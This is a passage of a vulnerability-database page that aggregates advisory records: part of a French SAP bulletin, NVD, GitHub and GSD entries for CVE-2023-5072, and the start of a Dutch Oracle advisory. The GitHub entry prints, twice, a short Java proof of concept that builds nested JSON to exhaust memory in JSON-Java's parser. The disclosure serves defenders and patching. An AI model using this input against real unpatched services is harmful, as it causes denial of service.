"description": "Commerce Cloud versions HY_COM 2205 et COM_CLOUD 2211 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "N/A",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "NetWeaver AS for ABAP and ABAP Platform versions 700, 701, 702, 731, 740, 750, 751, 752, 753, 754, 755, 756 et 757 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "N/A",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "BusinessObjects Business Intelligence Platform versions ENTERPRISE 430, 2025 et 2027 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "N/A",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "Business Planning and Consolidation versions BPC4HANA 200, 300, SAP_BW 750, 751, 752, 753, 754, 755, 756, 757, 758, 816, 914 et CPMBPC 810 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "N/A",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "Fiori App (F4044 Manage Work Center Groups) versions UIS4HOP1 600, 700, 800 et 900 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "N/A",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "Landscape Transformation Replication Server versions DMIS 2011_1_620, 2011_1_640, 2011_1_700, 2011_1_710, 2011_1_730, 2011_1_731, 2011_1_752 et 2020 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "N/A",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "Business One (SLD) versions B1_ON_HANA 10.0 et SAP-M-BO 10.0 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "N/A",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "NetWeaver ABAP Platform versions S4CRM 100, 200, 204, 205, 206, S4CEXT 109, BBPCRM 713 et 714 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "N/A",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "Commerce Cloud and Datahub versions HY_COM 2205, HY_DHUB 2205, COM_CLOUD 2211 et DHUB_CLOUD 2211 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "N/A",
"vendor": {
"name": "SAP",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2025-42911",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42911"
},
{
"name": "CVE-2025-42938",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42938"
},
{
"name": "CVE-2025-42958",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42958"
},
{
"name": "CVE-2025-42944",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42944"
},
{
"name": "CVE-2025-27428",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27428"
},
{
"name": "CVE-2025-22228",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22228"
},
{
"name": "CVE-2025-42916",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42916"
},
{
"name": "CVE-2025-42914",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42914"
},
{
"name": "CVE-2025-42961",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42961"
},
{
"name": "CVE-2025-42922",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42922"
},
{
"name": "CVE-2024-13009",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-13009"
},
{
"name": "CVE-2023-5072",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5072"
},
{
"name": "CVE-2025-42929",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42929"
},
{
"name": "CVE-2025-42920",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42920"
},
{
"name": "CVE-2025-42930",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42930"
},
{
"name": "CVE-2025-42913",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42913"
},
{
"name": "CVE-2025-42915",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42915"
},
{
"name": "CVE-2025-42918",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42918"
},
{
"name": "CVE-2025-42923",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42923"
},
{
"name": "CVE-2025-42926",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42926"
},
{
"name": "CVE-2025-42933",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42933"
},
{
"name": "CVE-2025-42917",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42917"
},
{
"name": "CVE-2025-42912",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42912"
},
{
"name": "CVE-2023-27500",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-27500"
},
{
"name": "CVE-2025-42925",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42925"
},
{
"name": "CVE-2025-42927",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42927"
},
{
"name": "CVE-2025-42941",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42941"
}
],
"initial_release_date": "2025-09-09T00:00:00",
"last_revision_date": "2025-09-09T00:00:00",
"links": [],
"reference": "CERTFR-2025-AVI-0764",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-09-09T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Injection de requ\u00eates ill\u00e9gitimes par rebond (CSRF)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits SAP. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0 distance et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits SAP",
"vendor_advisories": [
{
"published_at": "2025-09-09",
"title": "Bulletin de s\u00e9curit\u00e9 SAP september-2025",
"url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news/september-2025.html"
}
]
}
FKIE_CVE-2023-5072
Vulnerability from fkie_nvd - Published: 2023-10-12 17:15 - Updated: 2025-09-19 18:54
Severity
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Summary
Denial of Service in JSON-Java versions up to and including 20230618. A bug in the parser means that an input string of modest size can lead to indefinite amounts of memory being used.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:stleary:json-java:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5F4DB239-5ADA-4158-9B78-65672A05D31B",
"versionEndIncluding": "20230618",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Denial of Service in JSON-Java versions up to and including 20230618. \u00a0A bug in the parser means that an input string of modest size can lead to indefinite amounts of memory being used."
},
{
"lang": "es",
"value": "Denegaci\u00f3n de Servicio (DoS) en versiones JSON-Java hasta 20230618 incluida. Un error en el analizador significa que una cadena de entrada de tama\u00f1o modesto puede provocar el uso de cantidades indefinidas de memoria."
}
],
"id": "CVE-2023-5072",
"lastModified": "2025-09-19T18:54:20.100",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "cve-coordination@google.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2023-10-12T17:15:10.187",
"references": [
{
"source": "cve-coordination@google.com",
"url": "http://www.openwall.com/lists/oss-security/2023/12/13/4"
},
{
"source": "cve-coordination@google.com",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/stleary/JSON-java/issues/758"
},
{
"source": "cve-coordination@google.com",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/stleary/JSON-java/issues/771"
},
{
"source": "cve-coordination@google.com",
"url": "https://security.netapp.com/advisory/ntap-20240621-0007/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.openwall.com/lists/oss-security/2023/12/13/4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/stleary/JSON-java/issues/758"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/stleary/JSON-java/issues/771"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://security.netapp.com/advisory/ntap-20240621-0007/"
}
],
"sourceIdentifier": "cve-coordination@google.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-770"
}
],
"source": "cve-coordination@google.com",
"type": "Secondary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-770"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
GHSA-4JQ9-2XHW-JPX7
Vulnerability from github – Published: 2023-11-14 22:24 – Updated: 2025-08-22 20:55
VLAI
Summary
Java: DoS Vulnerability in JSON-JAVA
Details
Summary
A denial of service vulnerability in JSON-Java was discovered by ClusterFuzz. A bug in the parser means that an input string of modest size can lead to indefinite amounts of memory being used. There are two issues: (1) the parser bug can be used to circumvent a check that is supposed to prevent the key in a JSON object from itself being another JSON object; (2) if a key does end up being a JSON object then it gets converted into a string, using \ to escape special characters, including \ itself. So by nesting JSON objects, with a key that is a JSON object that has a key that is a JSON object, and so on, we can get an exponential number of \ characters in the escaped string.
Severity
High - Because this is an already-fixed DoS vulnerability, the only remaining impact possible is for existing binaries that have not been updated yet.
Proof of Concept
package orgjsonbug;
import org.json.JSONObject;
/**
* Illustrates a bug in JSON-Java.
*/
public class Bug {
private static String makeNested(int depth) {
if (depth == 0) {
return "{\"a\":1}";
}
return "{\"a\":1;\t\0" + makeNested(depth - 1) + ":1}";
}
public static void main(String[] args) {
String input = makeNested(30);
System.out.printf("Input string has length %d: %s\n", input.length(), input);
JSONObject output = new JSONObject(input);
System.out.printf("Output JSONObject has length %d: %s\n", output.toString().length(), output);
}
}
When run, this reports that the input string has length 367. Then, after a long pause, the program crashes inside new JSONObject with OutOfMemoryError.
Further Analysis
The issue is fixed by this PR.
Timeline
Date reported: 07/14/2023 Date fixed: Date disclosed: 10/12/2023
Severity
7.5 (High)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 20230618"
},
"package": {
"ecosystem": "Maven",
"name": "org.json:json"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "20231013"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-5072"
],
"database_specific": {
"cwe_ids": [
"CWE-358"
],
"github_reviewed": true,
"github_reviewed_at": "2023-11-14T22:24:08Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\nA denial of service vulnerability in JSON-Java was discovered by [ClusterFuzz](https://google.github.io/clusterfuzz/). A bug in the parser means that an input string of modest size can lead to indefinite amounts of memory being used. There are two issues: (1) the parser bug can be used to circumvent a check that is supposed to prevent the key in a JSON object from itself being another JSON object; (2) if a key does end up being a JSON object then it gets converted into a string, using `\\` to escape special characters, including `\\` itself. So by nesting JSON objects, with a key that is a JSON object that has a key that is a JSON object, and so on, we can get an exponential number of `\\` characters in the escaped string.\n\n### Severity\nHigh - Because this is an already-fixed DoS vulnerability, the only remaining impact possible is for existing binaries that have not been updated yet.\n\n### Proof of Concept\n```java\npackage orgjsonbug;\n\nimport org.json.JSONObject;\n\n/**\n * Illustrates a bug in JSON-Java.\n */\npublic class Bug {\n private static String makeNested(int depth) {\n if (depth == 0) {\n return \"{\\\"a\\\":1}\";\n }\n return \"{\\\"a\\\":1;\\t\\0\" + makeNested(depth - 1) + \":1}\";\n }\n\n public static void main(String[] args) {\n String input = makeNested(30);\n System.out.printf(\"Input string has length %d: %s\\n\", input.length(), input);\n JSONObject output = new JSONObject(input);\n System.out.printf(\"Output JSONObject has length %d: %s\\n\", output.toString().length(), output);\n }\n}\n```\nWhen run, this reports that the input string has length 367. Then, after a long pause, the program crashes inside new JSONObject with OutOfMemoryError.\n\n### Further Analysis\nThe issue is fixed by [this PR](https://github.com/stleary/JSON-java/pull/759).\n\n### Timeline\n**Date reported**: 07/14/2023\n**Date fixed**: \n**Date disclosed**: 10/12/2023",
"id": "GHSA-4jq9-2xhw-jpx7",
"modified": "2025-08-22T20:55:25Z",
"published": "2023-11-14T22:24:08Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/google/security-research/security/advisories/GHSA-4jq9-2xhw-jpx7"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5072"
},
{
"type": "WEB",
"url": "https://github.com/stleary/JSON-java/issues/758"
},
{
"type": "WEB",
"url": "https://github.com/stleary/JSON-java/issues/771"
},
{
"type": "WEB",
"url": "https://github.com/stleary/JSON-java/pull/759"
},
{
"type": "WEB",
"url": "https://github.com/stleary/JSON-java/commit/60662e2f8384d3449822a3a1179bfe8de67b55bb"
},
{
"type": "PACKAGE",
"url": "https://github.com/stleary/JSON-java"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Java: DoS Vulnerability in JSON-JAVA"
}
GSD-2023-5072
Vulnerability from gsd - Updated: 2023-12-13 01:20Details
Denial of Service in JSON-Java versions up to and including 20230618. A bug in the parser means that an input string of modest size can lead to indefinite amounts of memory being used.
Aliases
Aliases
{
"GSD": {
"alias": "CVE-2023-5072",
"id": "GSD-2023-5072"
},
"gsd": {
"metadata": {
"exploitCode": "unknown",
"remediation": "unknown",
"reportConfidence": "confirmed",
"type": "vulnerability"
},
"osvSchema": {
"aliases": [
"CVE-2023-5072"
],
"details": "Denial of Service in JSON-Java versions up to and including 20230618. \u00a0A bug in the parser means that an input string of modest size can lead to indefinite amounts of memory being used.\u00a0\n",
"id": "GSD-2023-5072",
"modified": "2023-12-13T01:20:51.048286Z",
"schema_version": "1.4.0"
}
},
"namespaces": {
"cve.org": {
"CVE_data_meta": {
"ASSIGNER": "security@google.com",
"ID": "CVE-2023-5072",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "\u2264 20230618"
}
]
}
}
]
},
"vendor_name": "https://github.com/stleary/JSON-java"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Denial of Service in JSON-Java versions up to and including 20230618. \u00a0A bug in the parser means that an input string of modest size can lead to indefinite amounts of memory being used.\u00a0\n"
}
]
},
"generator": {
"engine": "Vulnogram 0.1.0-dev"
},
"impact": {
"cvss": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"cweId": "CWE-770",
"lang": "eng",
"value": "CWE-770 Allocation of Resources Without Limits or Throttling"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/stleary/JSON-java/issues/758",
"refsource": "MISC",
"url": "https://github.com/stleary/JSON-java/issues/758"
},
{
"name": "https://github.com/stleary/JSON-java/issues/771",
"refsource": "MISC",
"url": "https://github.com/stleary/JSON-java/issues/771"
},
{
"name": "http://www.openwall.com/lists/oss-security/2023/12/13/4",
"refsource": "MISC",
"url": "http://www.openwall.com/lists/oss-security/2023/12/13/4"
}
]
},
"source": {
"discovery": "UNKNOWN"
}
},
"nvd.nist.gov": {
"cve": {
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:json-java_project:json-java:*:*:*:*:*:*:*:*",
"matchCriteriaId": "13919820-D849-4641-A7E6-6E01A01862F2",
"versionEndIncluding": "20230618",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Denial of Service in JSON-Java versions up to and including 20230618. \u00a0A bug in the parser means that an input string of modest size can lead to indefinite amounts of memory being used.\u00a0\n"
},
{
"lang": "es",
"value": "Denegaci\u00f3n de Servicio (DoS) en versiones JSON-Java hasta 20230618 incluida. Un error en el analizador significa que una cadena de entrada de tama\u00f1o modesto puede provocar el uso de cantidades indefinidas de memoria."
}
],
"id": "CVE-2023-5072",
"lastModified": "2023-12-13T18:15:44.510",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "cve-coordination@google.com",
"type": "Secondary"
}
]
},
"published": "2023-10-12T17:15:10.187",
"references": [
{
"source": "cve-coordination@google.com",
"url": "http://www.openwall.com/lists/oss-security/2023/12/13/4"
},
{
"source": "cve-coordination@google.com",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/stleary/JSON-java/issues/758"
},
{
"source": "cve-coordination@google.com",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/stleary/JSON-java/issues/771"
}
],
"sourceIdentifier": "cve-coordination@google.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-770"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-770"
}
],
"source": "cve-coordination@google.com",
"type": "Secondary"
}
]
}
}
}
}
NCSC-2024-0298
Vulnerability from csaf_ncscnl - Published: 2024-07-17 13:54 - Updated: 2024-07-17 13:54Summary
Kwetsbaarheden verholpen in Oracle Fusion Middleware
Notes
The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this page to enhance access to its information and security advisories. The use of this security advisory is subject to the following terms and conditions:
NCSC-NL makes every reasonable effort to ensure that the content of this page is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or continuous keeping up-to-date. The information contained in this security advisory is intended solely for the purpose of providing general information to professional users. No rights can be derived from the information provided therein.
NCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of this security advisory. This includes damage resulting from the inaccuracy of incompleteness of the information contained in the advisory.
This security advisory is subject to Dutch law. All disputes related to or arising from the use of this advisory will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings.
Feiten: Er zijn kwetsbaarheden verholpen in Oracle Fusion Middleware.
Interpretaties: Een kwaadwillende kan de kwetsbaarheden misbruiken om aanvallen uit te voeren die kunnen leiden tot de volgende categorieën schade:
* Denial-of-Service (DoS)
* Toegang tot gevoelige gegevens
* Toegang tot systeemgegevens
* Manipulatie van gegevens
* (Remote) code execution (Gebruikersrechten)
Oplossingen: Oracle heeft updates beschikbaar gesteld om de kwetsbaarheden te verhelpen. Zie de referenties voor meer informatie.
Kans: medium
Schade: high
CWE-122: Heap-based Buffer Overflow
CWE-145: Improper Neutralization of Section Delimiters
CWE-190: Integer Overflow or Wraparound
CWE-20: Improper Input Validation
CWE-200: Exposure of Sensitive Information to an Unauthorized Actor
CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
CWE-222: Truncation of Security-relevant Information
CWE-284: Improper Access Control
CWE-299: Improper Check for Certificate Revocation
CWE-306: Missing Authentication for Critical Function
CWE-328: Use of Weak Hash
CWE-377: Insecure Temporary File
CWE-400: Uncontrolled Resource Consumption
CWE-404: Improper Resource Shutdown or Release
CWE-416: Use After Free
CWE-552: Files or Directories Accessible to External Parties
CWE-601: URL Redirection to Untrusted Site ('Open Redirect')
CWE-770: Allocation of Resources Without Limits or Throttling
CWE-787: Out-of-bounds Write
CWE-918: Server-Side Request Forgery (SSRF)
CWE-377
- Insecure Temporary File
Affected products
Known affected
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
fusion_middleware
oracle
|
cpe:2.3:a:oracle:fusion_middleware:12.2.1.4.0:*:*:*:*:*:*:*
|
— |
5.3 (Medium)
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
fusion_middleware_mapviewer
oracle
|
cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.4.0:*:*:*:*:*:*:*
|
— | |
|
fusion_middleware
oracle
|
cpe:2.3:a:oracle:fusion_middleware:12.2.1.4.0:*:*:*:*:*:*:*
|
— |
CWE-22
- Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
fusion_middleware_mapviewer
oracle
|
cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.4.0:*:*:*:*:*:*:*
|
— | |
|
fusion_middleware
oracle
|
cpe:2.3:a:oracle:fusion_middleware:12.2.1.4.0:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
fusion_middleware_mapviewer
oracle
|
cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.4.0:*:*:*:*:*:*:*
|
— | |
|
fusion_middleware
oracle
|
cpe:2.3:a:oracle:fusion_middleware:12.2.1.4.0:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
fusion_middleware_mapviewer
oracle
|
cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.4.0:*:*:*:*:*:*:*
|
— | |
|
fusion_middleware
oracle
|
cpe:2.3:a:oracle:fusion_middleware:12.2.1.4.0:*:*:*:*:*:*:*
|
— |
9.8 (Critical)
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
fusion_middleware_mapviewer
oracle
|
cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.4.0:*:*:*:*:*:*:*
|
— | |
|
fusion_middleware
oracle
|
cpe:2.3:a:oracle:fusion_middleware:12.2.1.4.0:*:*:*:*:*:*:*
|
— |
7.1 (High)
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
fusion_middleware
oracle
|
cpe:2.3:a:oracle:fusion_middleware:12.2.1.4.0:*:*:*:*:*:*:*
|
— | |
|
fusion_middleware_mapviewer
oracle
|
cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.4.0:*:*:*:*:*:*:*
|
— |
8.8 (High)
Affected products
Known affected
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
fusion_middleware
oracle
|
cpe:2.3:a:oracle:fusion_middleware:12.2.1.4.0:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
fusion_middleware
oracle
|
cpe:2.3:a:oracle:fusion_middleware:12.2.1.4.0:*:*:*:*:*:*:*
|
— | |
|
fusion_middleware_mapviewer
oracle
|
cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.4.0:*:*:*:*:*:*:*
|
— |
6.5 (Medium)
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
fusion_middleware_mapviewer
oracle
|
cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.4.0:*:*:*:*:*:*:*
|
— | |
|
fusion_middleware
oracle
|
cpe:2.3:a:oracle:fusion_middleware:12.2.1.4.0:*:*:*:*:*:*:*
|
— |
CWE-404
- Improper Resource Shutdown or Release
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
fusion_middleware
oracle
|
cpe:2.3:a:oracle:fusion_middleware:12.2.1.4.0:*:*:*:*:*:*:*
|
— | |
|
fusion_middleware_mapviewer
oracle
|
cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.4.0:*:*:*:*:*:*:*
|
— |
CWE-404
- Improper Resource Shutdown or Release
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
fusion_middleware_mapviewer
oracle
|
cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.4.0:*:*:*:*:*:*:*
|
— | |
|
fusion_middleware
oracle
|
cpe:2.3:a:oracle:fusion_middleware:12.2.1.4.0:*:*:*:*:*:*:*
|
— |
9.8 (Critical)
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
fusion_middleware_mapviewer
oracle
|
cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.4.0:*:*:*:*:*:*:*
|
— | |
|
fusion_middleware
oracle
|
cpe:2.3:a:oracle:fusion_middleware:12.2.1.4.0:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
fusion_middleware
oracle
|
cpe:2.3:a:oracle:fusion_middleware:12.2.1.4.0:*:*:*:*:*:*:*
|
— | |
|
fusion_middleware_mapviewer
oracle
|
cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.4.0:*:*:*:*:*:*:*
|
— |
9.8 (Critical)
Affected products
Known affected
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
fusion_middleware
oracle
|
cpe:2.3:a:oracle:fusion_middleware:12.2.1.4.0:*:*:*:*:*:*:*
|
— |
6.4 (Medium)
Affected products
Known affected
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
fusion_middleware
oracle
|
cpe:2.3:a:oracle:fusion_middleware:12.2.1.4.0:*:*:*:*:*:*:*
|
— |
5.9 (Medium)
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
fusion_middleware
oracle
|
cpe:2.3:a:oracle:fusion_middleware:12.2.1.4.0:*:*:*:*:*:*:*
|
— | |
|
fusion_middleware_mapviewer
oracle
|
cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.4.0:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
fusion_middleware
oracle
|
cpe:2.3:a:oracle:fusion_middleware:12.2.1.4.0:*:*:*:*:*:*:*
|
— |
9.8 (Critical)
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
fusion_middleware_mapviewer
oracle
|
cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.4.0:*:*:*:*:*:*:*
|
— | |
|
fusion_middleware
oracle
|
cpe:2.3:a:oracle:fusion_middleware:12.2.1.4.0:*:*:*:*:*:*:*
|
— |
Affected products
Known affected
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
fusion_middleware
oracle
|
